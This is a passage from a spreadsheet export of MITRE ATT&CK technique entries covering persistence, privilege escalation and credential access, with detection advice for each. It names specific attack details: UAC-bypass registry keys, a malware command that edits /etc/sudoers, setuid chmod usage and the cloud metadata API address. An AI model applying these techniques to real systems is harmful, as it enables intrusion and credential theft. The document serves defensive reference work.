When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands.
Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. 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 (Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</t>
  </si>
  <si>
    <t>Adversaries may create or edit shortcuts to run a program during system boot or user login. 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[Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>T1547.011</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8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&lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user's privileges). 
Adversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) 
A specific plist used for execution at login is &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items).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 (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method &lt;code&gt; SMLoginItemSetEnabled&lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,File monitoring,DLL monitoring,API monitoring</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. 
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process command-line parameters,API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.
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Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.</t>
  </si>
  <si>
    <t>privilege-escalation,defense-evasion</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However,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&lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</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</si>
  <si>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Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>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 (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: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remote systems and default to high integrity.(Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle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 (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt; (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>Office 365 audit logs,OAuth audit logs,Authentication logs</t>
  </si>
  <si>
    <t>Windows,Office 365,SaaS</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
</t>
  </si>
  <si>
    <t>defense-evasion,lateral-movement</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>Office 365 audit logs,OAuth audit logs</t>
  </si>
  <si>
    <t>Office 365,SaaS</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. 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
Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).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access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
[Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
[Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>Office 365 audit logs,Authentication logs</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Azure activity logs,Authentication logs,AWS CloudTrail logs,Windows event logs,File monitoring,Windows Registry,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
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
Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>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 (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Adversaries may search the Registry on compromised systems for insecurely stored credentials. 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t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may search the bash command history on compromised systems for insecurely stored credentials. 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 (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</t>
  </si>
  <si>
    <t>Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:&amp;#92;Users&amp;#92;(username)&amp;#92;.ssh&amp;#92;&lt;/code&gt; on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>Authentication logs,AWS CloudTrail logs,Azure activity logs</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
